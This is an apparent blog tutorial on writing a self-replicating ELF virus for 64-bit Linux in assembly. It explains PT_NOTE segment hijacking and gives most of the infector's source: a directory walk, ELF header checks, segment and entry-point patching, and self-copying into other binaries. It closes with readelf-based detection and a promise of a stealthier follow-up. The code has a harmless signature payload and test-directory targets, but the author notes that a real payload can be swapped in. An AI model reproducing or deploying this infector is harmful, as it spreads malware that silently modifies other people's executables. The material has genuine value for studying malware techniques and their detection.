Infectors: how to make a simple self-replicating program on Linux.
Introduction⌗
During this post, we will learn how to code a simple ELF infector on Linux. This infector will spread and sel-replicate inside the other binaries that it finds. It will get executed when infected binaries are launched so that it can spread even more. The payload will be harmless, just a signature to attest that the binary has been infected. This infector will be very basic and undisguised at all, any reverse-engineer could see that a file has been infected by executing a simple readelf
command (We will get more into that later).
You can check the full source code here
How does it work ?⌗
The technique that we will use here is called PT_NOTE segment hijacking. To understand how it works, we first need to understand the ELF format. The first element of an ELF file is the ELF header, it gives us the info we need to understand and read the rest of the file. Then comes the Program Header table, it will describe how the file is being organized. Each program header describes a part of the file, a part can belong to several program headers. Each entry is described by the following C structure (man elf
for more information).
typedef struct {
uint32_t p_type;
uint32_t p_flags;
Elf64_Off p_offset;
Elf64_Addr p_vaddr;
Elf64_Addr p_paddr;
uint64_t p_filesz;
uint64_t p_memsz;
uint64_t p_align;
} Elf64_Phdr;
The p_type
field describes what kind of program header it is. There are two types that interests us :
-
PT_LOAD: The array element specifies a loadable segment, described by p_filesz and p_memsz. The bytes from the file are mapped to the beginning of the memory segment. If the segment's memory size p_memsz is larger than the file size p_filesz, the "extra" bytes are defined to hold the value 0 and to follow the segment's initialized area. The file size may not be larger than the memory size. Loadable segment entries in the program header table appear in ascending order, sorted on the p_vaddr member.
-
PT_NOTE: The array element specifies the location of notes (ElfN_Nhdr).
The PT_LOAD
are being loaded in memory which means that with the right permissions, we can execute the content of it. The PT_NOTE
simply gives the location of notes that are useless for the program during its execution. There should be a PT_NOTE
segment on every binary compiled the usual way. The technique will consists in changing this PT_NOTE
segment to a PT_LOAD
pointing to the end of the file where we will put our code. This way, it will be mapped into memory without altering the file too much and we will be able to execute it.
To execute it, we will look a bit more at the ELF header structure defined as
#define EI_NIDENT 16
typedef struct {
unsigned char e_ident[EI_NIDENT];
uint16_t e_type;
uint16_t e_machine;
uint32_t e_version;
ElfN_Addr e_entry;
ElfN_Off e_phoff;
ElfN_Off e_shoff;
uint32_t e_flags;
uint16_t e_ehsize;
uint16_t e_phentsize;
uint16_t e_phnum;
uint16_t e_shentsize;
uint16_t e_shnum;
uint16_t e_shstrndx;
} ElfN_Ehdr;
The field that interests us here is e_entry
which will define the entrypoint of our program. If we put our code, the program will execute it and we will just have to transfer the execution back to the original entrypoint so that the program can keep its course.
The code⌗
Filesystem reading⌗
The first thing to do will be finding files to infect. For safety reason and because we don’t want to launch our program as root, we will not look for those in /bin
or /usr/bin
but in /tmp/test
and /tmp/test2
.
_start:
push rbp
mov rbp, rsp
sub rsp, 0x10
lea rdi, [rel cwd]
mov rsi, O_DIRECTORY | O_RDONLY
xor eax, eax
add al, SYS_OPEN
syscall
mov [rsp], eax ; We open and save the fd of the cwd so that we will be able
; to chdir back to it after we are don
lea rdi, [rel dir1] ; /tmp/test
call readdir
lea rdi, [rel dir2] ; /tmp/test2
call readdir
mov edi, [rsp]
xor eax, eax
add al, SYS_FCHDIR
syscall ; Back to our initial cwd to not break the executed binary (eg. ls)
mov edi, [rsp]
xor eax, eax
add eax, SYS_CLOSE
syscall
leave
This code chunk will allow us to call the readdir
function that we will use to run through files in both of the target directories. To use those files then, we want to open them with relative paths to avoid string operations that are a bit painful in ASM so we will use chdir
to open them directly. Our first step to avoid breaking the infected program (eg ls
) will be to open our current working directory to be able to get back to it once the job is done.
readdir:
push rbp
mov rbp, rsp
sub rsp, 0x20
mov eax, SYS_CHDIR ; Let's change the directory to open file,
; string operations are painful in ASM so relative paths will do
syscall
mov rsi, O_DIRECTORY | O_RDONLY
xor eax, eax
add eax, SYS_OPEN
syscall
mov [rsp], eax
xor rdi, rdi
mov rsi, 0x1000
add rdx, PROT_READ | PROT_WRITE
mov r10, MAP_ANONYMOUS | MAP_PRIVATE
xor r8, r8
dec r8
xor r9, r9
xor eax, eax
add al, SYS_MMAP
syscall ; We map a page for the getdents buffer
test al, al
jnz end_readdir
mov [rsp + 0x8], rax
loop_dir:
mov edi, [rsp]
mov rsi, [rsp + 0x8]
mov rdx, DIRENT_MAX_SIZE
xor eax, eax
add al, SYS_GETDENTS64
syscall
cmp eax, 0
jle end_readdir
mov [rsp + 0x4], eax
xor r8, r8
loop_buf_dirent:
mov [rsp + 0x10], r8w
mov r9, [rsp + 0x8]
cmp BYTE [r9 + r8 + d_type], DT_REG
jne next_dirent
lea rdi, [r9 + r8 + d_name]
call infect ; We only infect regular files
next_dirent:
mov r9, [rsp + 0x8]
movzx r8, WORD [rsp + 0x10]
add r8w, [r9 + r8 + d_reclen]
cmp r8w, [rsp + 4]
jl loop_buf_dirent
jmp loop_dir
end_readdir:
mov edi, [rsp]
xor eax, eax
add eax, SYS_CLOSE
syscall
mov rdi, [rsp + 0x8]
mov rsi, 0x1000
mov eax, SYS_MUNMAP
syscall
leave
ret
With the readdir
function, we will loop through all the linux_dirent64
structures present in each of the target directories. If the current structure describes a regular file, we will call the infect
function with its name as argument to try to infect it.
Preliminary checks⌗
The infect
function will be the main function of our program. To make the code more clean, I’ve defined a structure called Infection_struct
in defines.s
that will allow me, by considering the stack frame as this structure to use its fields as local variable names.
infect:
push rbp
mov rbp, rsp
sub rsp, INFECTOR_STRUCT_SIZE
mov esi, O_RDWR
mov eax, SYS_OPEN
syscall
cmp eax, 0
jl quit_infect
mov [rsp + inf_fd], eax
mov edi, [rsp + inf_fd]
lea rsi, [rsp + inf_elfhdr]
mov rdx, ELFHDR_SIZE
mov eax, SYS_READ
syscall
lea rbx, [rsp + inf_elfhdr]
lea rax, [rbx + e_ident]
cmp [rax], DWORD ELF_MAGIC
jne close_quit_infect
cmp [rax + EI_CLASS], BYTE ELFCLASS64
jne close_quit_infect
cmp [rax + EI_DATA], BYTE ELFDATA2LSB ; Only ELF 64 bits are being taken into account
jne close_quit_infect
cmp [rax + EI_PAD], DWORD INFECTION_MAGIC ; We check them to avoid double infection
je close_quit_infect
mov rdx, [rax + e_phnum]
test rdx, rdx
je close_quit_infect
mov ax, [rbx + e_type]
cmp ax, ET_EXEC
je right_type_check
cmp ax, ET_DYN
jne close_quit_infect
The first part of this function is just about parsing the ELF header to check for several things:
- The file is a valid ELF file
- It is either an executable file or a shared object file
- It has not been infected yet
Since it is useless and memory-consuming to reinfect a file, we will prevent that to append. In the e_ident
field of the ELF header, there are some padding bytes that are unused and zero-filled. We will put an infection marker here to keep track of the already infected binaries.
right_type_check:
mov edi, [rsp + inf_fd]
xor rsi, rsi
mov rdx, SEEK_END
mov eax, SYS_LSEEK
syscall
mov [rsp + inf_filesize], rax
mov rsi, rax
xor rdi, rdi
mov rdx, PROT_READ | PROT_WRITE
mov r10, MAP_SHARED
mov r8d, [rsp + inf_fd]
xor r9, r9
mov eax, SYS_MMAP
syscall ; We map the file into memory to operate on it
test al, al
jnz close_quit_infect
mov [rsp + inf_map], rax
mov [rax + e_ident + EI_PAD], DWORD INFECTION_MAGIC ; Mark binary for infection
mov QWORD [rsp + inf_notehdr], 0
mov r8, rax
add r8, [rax + e_phoff]
movzx rcx, WORD [rax + e_phnum]
loop_phdrs:
cmp [r8 + p_type], DWORD PT_NOTE
jne cmp_load_phdr
mov QWORD [rsp + inf_notehdr], r8
cmp_load_phdr:
cmp [r8 + p_type], DWORD PT_LOAD
jne next_phdr
mov QWORD [rsp + inf_last_pt_load], r8
next_phdr:
add r8w, [rax + e_phentsize]
loop loop_phdrs
check_if_note_exists:
mov rax, [rsp + inf_notehdr]
test rax, rax
jz munmap_quit_infect
This next code chunk is gonna map the file into memory and get some information that are gonna be useful for the infection routine such as:
- the file size
- the
PT_NOTE
phdr address - the last
PT_LOAD
phdr address
Infection⌗
Once we have every needed information, we can get to the serious part.
patch_note_phdr:
mov rax, [rsp + inf_notehdr]
mov [rax + p_type], DWORD PT_LOAD ; We make it loadable
mov [rax + p_flags], DWORD PF_R | PF_X ; And executable
mov rdx, QWORD [rsp + inf_filesize] ; It starts at the EOF
mov QWORD [rax + p_offset], rdx
mov QWORD [rax + p_filesz], virus_len ; We update the sizes
mov QWORD [rax + p_memsz], virus_len
mov QWORD [rax + p_align], 0x1000 ; And the alignement
mov rdx, [rsp + inf_last_pt_load]
mov rcx, [rdx + p_vaddr] ; we get the last page used
and cx, 0xf000 ; we align the address on page border
add rcx, [rsp + inf_filesize] ; and we add the file size to it so that
; it will be on another page and also to keep
; offset and address consistent
mov [rax + p_vaddr], rcx ; We put it after the last address mapped into memory
mov [rax + p_paddr], rcx ; but we have to align it on another page
sub rax, [rsp + inf_map] ; We convert our infected segment's address to
mov [rsp + inf_notehdr], rax ; an offset in case remapping changes the map address
This is the code that will handle the PT_NOTE
hijacking. If we want our program to execute, we need the new PT_LOAD
header to be valid so we will have to change a lot of its fields.
p_type
: We will switch it fromPT_NOTE
toPT_LOAD
to tell the system that we want to map our code into the memory.p_flags
: ForPT_LOAD
segments, this field is used to define the permissions that will be granted to our segment. We will give it read and execute permissions because that’s all ot needs.p_offset
: This field defines here the segment starts, since we are gonna put our code at the end of the file, we will put the file size value here.p_file/memsz
: Those are used to tell the system the place it needs to reserve in memory and how many bytes of the file it has to put in. We will define both as the virus length (We will see how to get it later)p_p/vaddr
: Those are the physical and virtual addresses where the segment will be mapped. It is said in the man thatLoadable process segments must have congruent values for p_vaddr and p_offset, modulo the page size.
so we will take the page right after the last already existingPT_LOAD
and then add it the file size so that we are sure that he offset and addresses values have congruent values.p_align
: Loadable segments are aligned on memory pages so we will change it to the usual size of a page (0x1000 bytes)
adjust_file_size:
mov edi, [rsp + inf_fd]
mov rsi, [rsp + inf_filesize]
add rsi, virus_len
mov QWORD [rsp + inf_new_filesize], rsi
mov eax, SYS_FTRUNCATE
syscall
test eax, eax
jnz munmap_quit_infect
mov rdi, [rsp + inf_map]
mov rsi, [rsp + inf_filesize]
mov rdx, [rsp + inf_new_filesize]
xor r10, r10
add r10b, MREMAP_MAYMOVE
mov eax, SYS_MREMAP
syscall
test al, al
jnz munmap_quit_infect
mov [rsp + inf_map], rax ; This might break the reference to the phdrs
; but they are not needed anymore
mov rdi, [rsp + inf_map]
add rdi, [rsp + inf_filesize]
lea rsi, [rel _start]
mov rcx, virus_len
copy_payload:
lodsb
stosb
loop copy_payload
patch_entrypoint:
mov r8, [rsp + inf_map]
mov rax, r8
add rax, [rsp + inf_notehdr]
mov rdx, [r8 + e_entry] ; We save the old entrypoint
mov rcx, [rax + p_vaddr]
mov QWORD [r8 + e_entry], rcx ; We change the entrypoint to our code
add rcx, final_jmp_offset ; The address to patch
sub rdx, rcx ; We have the relative jump
mov rcx, [rax + p_offset]
add rcx, r8
add rcx, final_jmp_offset - 4 ; The file offset of the address to patch
mov DWORD [rcx], edx ; We return to the original entrypoint
munmap_quit_infect:
mov rdi, [rsp + inf_map]
mov rsi, [rsp + inf_filesize]
mov eax, SYS_MSYNC
syscall
mov rdi, [rsp + inf_map]
mov rsi, [rsp + inf_filesize]
mov eax, SYS_MUNMAP
syscall
close_quit_infect:
mov edi, [rsp + inf_fd]
mov eax, SYS_CLOSE
syscall
quit_infect:
leave
ret
signature: db 0, SIGNATURE, 0
dir1: db "/tmp/test/", 0
dir2: db "/tmp/test2/", 0
cwd: db ".", 0
_end:
xor rdi, rdi
mov eax, SYS_EXIT
syscall
Once our new segment has been created, it is time to put the code inside the file. Since we are working with a memory mapped file, we need to remap it to extend it first. Once this has been done, we just go to the previous end of the file and we copy the payload there. To get the size of our payload, we use the _end
beacon that we put at the end so that we can define virus_len
as _end - _start
.
Once our payload has been copied, the last step is to hijack the control flow to get it executed. To do that we will first add the following lines to _start
:
jmp _end
final_jmp_offset equ $ - _start
With this line, the program will cleanly quits after its first execution. We can also use this jmp
to jmp back to the original entrypoint after the virus execution. In x86_64 assembly, a jump is encoded as opcode relative_offset
starting from the final_jmp_offset
label.
We can obtain this offset with the formula : old_entrypoint_address - final_jmp_offset
.
Once we replaced the jmp address in the copied code, everything is set but there is still one thing to do for the infector to fully work : preserve its registers.
Indeed, the host program code might expect some special values in some register that we used (like argc
and argv
in rdi
and rsi
) so we will push those important registers at the very beginning of our program and pop them just before the final jump.
Conclusion⌗
We can now infect any ELF 64-bits of our system and get anything executed executed by it if we insert a real payload inside but we have a problem : our technique is not stealthy at all, we can be spotted by readelf
.
readelf
is a linux command that allows us to inspect ELF files, we will use it with the -l
option to display the program headers of a simple Hello World coded in C before and after infection.
Elf file type is DYN (Shared object file)
Entry point 0x1050
There are 11 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x0000000000000268 0x0000000000000268 R 0x8
INTERP 0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000560 0x0000000000000560 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000001bd 0x00000000000001bd R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x0000000000000158 0x0000000000000158 R 0x1000
LOAD 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000248 0x0000000000000250 RW 0x1000
DYNAMIC 0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
0x00000000000001e0 0x00000000000001e0 RW 0x8
NOTE 0x00000000000002c4 0x00000000000002c4 0x00000000000002c4
0x0000000000000044 0x0000000000000044 R 0x4
GNU_EH_FRAME 0x0000000000002014 0x0000000000002014 0x0000000000002014
0x000000000000003c 0x000000000000003c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000218 0x0000000000000218 R 0x1
This is how a normal file looks like, it has 4 load segments including a single one that is executable for the code and a single one that is writable for the data segment. It also has a NOTE header that is containing notes about the program.
After the infection, it will look more like :
Elf file type is DYN (Shared object file)
Entry point 0x70e0
There are 11 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x0000000000000268 0x0000000000000268 R 0x8
INTERP 0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000560 0x0000000000000560 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000001bd 0x00000000000001bd R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x0000000000000158 0x0000000000000158 R 0x1000
LOAD 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000248 0x0000000000000250 RW 0x1000
DYNAMIC 0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
0x00000000000001e0 0x00000000000001e0 RW 0x8
LOAD 0x00000000000040e0 0x00000000000070e0 0x00000000000070e0
0x000000000000038a 0x000000000000038a R E 0x1000
GNU_EH_FRAME 0x0000000000002014 0x0000000000002014 0x0000000000002014
0x000000000000003c 0x000000000000003c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000218 0x0000000000000218 R 0x1
We can now see that there is another load segment which has execution permissions. It is super weird and should not be there at all, we can also notice that obviously, the NOTE segment disappeared. Another odd thing is the fact that the entrypoint is pointing on that segment. The code segment is almost always mapped at 0x1000 and the entrypoint is usually at the beginning of it so 0x70e0 definitely doesn’t look legit. This is how you can see that this file is not legitimate and probably infected without even the need to properly analyze it.
Lucky for us, we are gonna learn how to make an infector that will not induce any peculiar change in the ELF file structure. It will keep the original entrypoint and it will not change the number of load segments nor their permissions.
Part 2. Advanced infectors: How to make our infector stealthy and hardly detectable